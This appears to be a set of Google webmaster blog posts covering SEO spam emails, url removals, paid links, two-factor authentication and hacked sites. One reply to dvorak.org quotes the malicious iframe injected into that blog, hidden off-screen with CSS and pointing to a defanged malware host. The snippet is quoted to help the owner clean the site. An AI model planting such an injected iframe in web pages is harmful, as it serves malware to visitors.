I was on your website www.google.com and wanted to shoot you a quick note. I think I can make a few changes (aesthetically and/or SEO – wise) to make your site convert more visitors into leads and to get it placed higher in the organic search results, for a few of the select terms.

This is NOT like one of those foreign emails you probably get in your inbox every day. Just to be upfront I have 3 agents that work with me for development /SEO.

I would just need to know which (if not both) services you’re open to checking out information about, either web design or SEO. Would you be open to seeing more brief info / quote for what I would like to accomplish?

Regards,
XXXXXX XXXXX

So this person is offering help to convert Google visitors into leads. Or, you know, to improve Google’s rankings in organic search results. Sigh.

Earlier this week, I got a different email that said

I would like to extend our knowledge to your audience in the form of a uest post [sic]. This post will be written by a college educated writer fluent in English.

To recap we will provide-
- 100% original guest post with statical [sic] data and studies from professional writers.

Here’s my rule of thumb: if someone sends you an email with an SEO offer out of the blue, be skeptical. For example, check out some other fun SEO emails that I’ve gotten in the past.

This is the fourth Penguin-related launch Google has done, but because this is an updated algorithm (not just a data refresh), we’ve been referring to this change as Penguin 2.0 internally. For more information on what SEOs should expect in the coming months, see the video that we recently released.

Added: If there are spam sites that you’d like to report after Penguin, we made a special spam report form at http://bit.ly/penguinspamreport . Tell us about spam sites you see and we’ll check it out.

Bear in mind that this is a very rough estimate, because priorities, projects, and timing can change based on a lot of different factors. But I hope this gives folks a ballpark idea of what to expect in the coming months as far as what my team is working on.

When we see misconceptions, we try to figure out where the confusion happened and how to prevent that type of confusion in the future. It’s also safe to assume when you read “Google cancelled my account” stories that there’s usually another side to the story, even if for some reason Google doesn’t go into the details.

My guess is that you haven’t seen this one unless you live in Switzerland. A few months ago, a friend noticed this complaint in Heute Online:

My ability to read German is well, practically non-existent except for spammy words. So I asked a friend to translate it for me — thanks, Johanna. Here’s roughly what it says:

Search giant kicks Swiss blogger out of the index

“Google is evil after all”

Zurich – On his blog, Benbit* from Zurich often discloses security holes of big companies. This makes him unpopular (see box) – so unpopular that Google kicked him out of the index.

heute: Congratulations, you are one of the first Swiss citizens to be kicked out by Google. Proud?
Benbit: Nowadays, everybody uses Google. So, it is not funny at all if you suddenly disappear completely from the search engine. To me, Google’s motto “Don’t be evil” is not right. Google is evil and misuses its power.

Why did Google delete your site?
I don’t have a clue. I sent emails and registered letters, but no one contacted me to give me reasons for this.

Might it be possible that this is connected to your hacker activities? Didn’t you publish the security holes of many companies on your blog?
I did, but this doesn’t violate Google’s guidelines. I am neither a spammer nor have I been doing illegal search engine optimisation for my blog. My only explanation is that I stepped on the toes of a Google advertising client who in turn complained about me.

Any idea who this might be?
Well, one of the companies that I mentioned on my blog. Among them are also powerful major banks.

As a small blogger, do you have any chance at all against Google?
What Google is doing is a clear case of censorship and violates Switzerland’s federal constitution. I demand from Google to provide me with information about the deletion from the index. Otherwise, I am also considering going to a justice of the peace.
* Name known to the editor. PS: Until our press deadline, Google did not comment.

http://blog.benbit.ch

Okay, let’s pause for a second. At this point in the story, I think we can all agree that Google is 100%, pure, concentrated eeeeeevil. How dare they squash that poor, hapless blogger at benbit.ch?

Except I haven’t told our side of the story. Our side of the story is pretty short: someone from benbit.ch used our automated url removal tool to remove benbit.ch themselves. Now why would someone from benbit.ch remove their own site (multiple times with multiple url patterns over multiple months, I might add), and then lay the blame at Google’s feet? I could speculate, but I genuinely have no idea.

One important thing to mention is that even with a really harsh story like this, we still look for ways to do better. For example, this incident happened in March of 2007 using our “old” url removal tool that had been up for years. In April 2007, the webmaster tools team rolled out a new version of the url removal tool. In my opinion, it kicks butt over the old tool in a couple ways:

1) site owners can easily see the urls that they’ve removed themselves.
2) site owners can easily revoke a url pattern that they’ve entered in the past.

Just to show you what I mean, here’s a snapshot where I’ve removed everything in the http://www.mattcutts.com/files/ directory of my site:

As you can see, I can easily view the removal url patterns that I’ve submitted, and there’s a “Re-include” button if I decide to revoke a removal and start showing the urls again.

My takeaways from this post would be:

- Sometimes people say negative things about Google. Remember that there is often another side to the story.
- Even when people say negative things, folks at Google do listen and look for ways to improve. Case in point: the newer url removal tool resolves a whole class of potential misunderstandings like the one above.
- Google does provide a lot of useful tools for site owners.

I’m glad that the webmaster tools team works to make it easier to debug and to fix lots of issues for site owners. If the tool had launched just a month or two earlier, the folks at benbit.ch could have diagnosed their issue themselves — but at least everyone can benefit from the better tool now.

http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.

I took a few minutes to compose a reply, so I’ll go ahead and post it here:

Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages.

At the top of the page, the malicious iframe looks like this: <style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class=”rrfhezo”><iframe src=”hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js” width=”420″ height=”475″></iframe>

I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code.

We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/

Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome.

Hope that helps,
Matt Cutts

I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.

Several of the slides have links to additional information, in case you’re interested. We announced the disavow links tool during my session so that’s what a lot of the slides are about.

Please ask your questions in on the Google Moderator page, not in the comments here. When the comments are in Moderator, people can vote them up and down.

Hi, the usual reason why a site’s PageRank drops by 30-50% like this is because the site violates our quality guidelines by selling links that pass PageRank. Here’s our documentation on that: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=66356 and here’s a video I made about this common case: http://www.youtube.com/watch?v=kFcJ7PaLoMw (it’s about 1:30 into the video). http://www.nytimes.com/2012/08/26/business/book-reviewers-for-hire-meet-a-demand-for-online-raves.html?_r=1&pagewanted=all is a good recent article about paid reviews. In Google’s world, we take paid links that pass PageRank as seriously as Amazon would take paid reviews without disclosure or as your newspaper would treat a reporter who was paid to link to a website in an article without disclosing the payment.

In particular, earlier this year on [website] we saw links labeled as sponsored that passed PageRank, such as a link like [example link]. That’s a clear violation of Google’s quality guidelines, and it’s the reason that [website]‘s PageRank as well as our trust in the website has declined.

In fact, we received a outside spam report about your site. The spam report passed on an email from a link seller offering to sell links on multiple pages on [website] based on their PageRank. Some pages mentioned in that email continue to have unusual links to this day. For example [example url] has a section labeled “PARTNER LINKS” which links to [linkbuyer].

So my advice would be to investigate how paid links that pass PageRank ended up on [website]: who put them there, are any still up, and to investigate whether someone at the [newspaper] received money to post paid links that pass PageRank without disclosing that payment, e.g. using ambiguous labeling such as “Partner links.” That’s definitely where I would dig.

After that investigation is complete and any paid links that pass PageRank are removed, the site’s webmaster can do a reconsideration request using Google’s free webmaster tools console at google.com/webmasters. I would include as much detail as you can about what you found out about the paid links. That will help us assess how things look going forward.

Sincerely,
Matt

That’s about it. This case was interesting because we also had an external spam report about the newspaper selling links.

Two-factor authentication means “something you know” (like a password) and “something you have,” which can be an object like a phone. Here’s a simple video about how it works:

I often hear the same questions or objections when I recommend two-factor authentication. Jeff Atwood has done a good job of debunking common misperceptions–check out his post, which even has pictures. But here are some misconceptions that I hear, along with the reality:

Myth #1: But what if my cell phone doesn’t have SMS/signal, or I’m in a foreign country?
Reality: You can install a standalone app called Google Authenticator (it’s also available in the App Store), so your cell phone doesn’t need a signal.

Myth #2: Okay, but what about if my cell phone runs out of power, or my phone is stolen?
Reality: You can print out a small piece of paper with 10 one-time rescue codes and put that in your wallet. Use those one-time codes to log in even without your phone.

Myth #3: Don’t I have to fiddle with an extra PIN every time I log in?
Reality: You can tell Google to trust your computer for 30 days and sometimes even longer.

Myth #4: I heard two-factor authentication doesn’t work with POP and IMAP?
Reality: You can still use two-factor authentication even with POP and IMAP. You create a special “application-specific password” that your mail client can use instead of your regular password. You can revoke application-specific passwords at any time.

Myth #5: Okay, but what if I want to verify how secure Google Authenticator is?
Reality: Google Authenticator is free, open-source, and based on open standards.

Myth #6: So Google Authenticator is a free and open-source, but does anyone else use it?
Reality: Yes! You can use Google Authenticator to do two-factor authentication with LastPass, WordPress, Dropbox, Amazon Web Services, Drupal, Stripe, and DreamHost, or even use a YubiKey device. There’s even a Pluggable Authentication Module (PAM) so you can add two-factor authentication to any PAM-enabled application. That means you can use Google Authenticator to add two-factor authentication to SSH, for example.

One last tip: use a different password on Gmail/Google than on other services. If you reuse a password and a hacker cracks into one company, they can use the same password to crack into your Google account.

Please don’t wait to turn on 2-step verification. It’s not that hard, and it will really protect your account. Why not set up two-step authentication right now?

Added August 26, 2012: Dropbox added support, so I included a link above.

For example, recently a well-known musician’s website was hacked. The management firm for the musician wrote in to say that the site was clean now. Here’s the reply I sent back:

Unfortunately when our engineers checked this morning, the site was still hacked. I know the page looks clean to you, but when we send Googlebot to fetch www.[domain].com this morning, we see

<title>Generic synthroid bad you :: Canadian Pharmacy</title>

on the page. What the hackers are doing is sneaky but unfortunately pretty common. When you surf directly to the website, you see normal content. But when a search engine (or a visitor from a search engine) visits the website, they see hacked drug-related content. The reason that the hackers do it this way is so that the hacked content is harder to find/remove and so that hacked content stays up longer.

The fix in this case is to go deeper to clean the hack out of your system. See http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163634 for some tips on how to do this, but every website is different.

One important tool Google provides to help in assessing whether a site is cleaned up is our “Fetch as Googlebot” feature in our free webmaster console at http://google.com/webmasters/ . That tool lets you actually send Googlebot to your website and see exactly what we see when we fetch the page. That tool would have let you known that the website was still hacked.

I hope that helps give an idea of where to go next.

Something I love about “Fetch as Googlebot” is that it’s self-service–you don’t even need to talk to anyone at Google to diagnose whether your hacked site looks clean.